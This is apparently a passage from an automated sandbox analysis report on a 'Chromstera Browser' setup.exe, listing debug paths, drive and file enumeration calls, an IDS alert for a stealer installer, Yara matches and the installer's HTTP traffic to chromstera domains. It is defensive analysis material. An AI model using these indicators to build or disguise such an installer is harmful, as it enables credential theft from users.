                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: n.pdb" source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\Updater.pdb source: ChromsteraUpdater.exe, 00000008.00000000.1793999764.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbR source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbfi source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: setup.exe, Chromnius-Main.msi.0.dr
                      Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089q8 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \Sre.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89+&| source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: setup.exe
                      Source: Binary string: System.Management.Automation.pdblb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: setup.exe, MSICC66.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdblat* source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb[ source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd50a source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E313000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb) source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb'iM source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbtionmw source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wininet.pdbUGP source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: setup.exe, lzmaextractor.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.exe, MSI3193.tmp.0.dr, MSICBB9.tmp.1.dr, MSICA7D.tmp.1.dr, MSI331F.tmp.0.dr, MSI35E5.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: C:\Users\user\Desktop\setup.exeFile opened: z:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: x:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: v:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: t:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: r:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: p:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: n:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: l:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: j:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: h:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: f:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: b:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: y:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: w:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: u:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: s:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: q:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: o:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: m:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: k:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: i:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: g:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: c:
                      Source: C:\Users\user\Desktop\setup.exeFile opened: a:Jump to behavior
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCBDA0 FindFirstFileW,GetLastError,FindClose,0_2_00CCBDA0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC2290 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BC2290
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCB3A0 _wcsrchr,_wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,_wcsrchr,0_2_00CCB3A0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCB7D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCB7D0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000DEAA0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,8_2_000DEAA0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00184E5C FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00184E5C

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49734 -> 104.21.8.139:443
                      Yara detected MalDoc
                      Source: Yara matchFile source: C:\Windows\Installer\6bc77d.msi, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:59151 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: GET /cross/crx3dynamic/?adv=426&v=4.4&time=1730139128 HTTP/1.1Host: secure.chromstera.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 151.101.130.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 151.101.194.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 151.101.130.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 151.101.194.133
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: global trafficHTTP traffic detected: GET /cross/crx3dynamic/?adv=426&v=4.4&time=1730139128 HTTP/1.1Host: secure.chromstera.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: */*User-Agent: AdvancedInstallerHost: chromsteraupdates.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
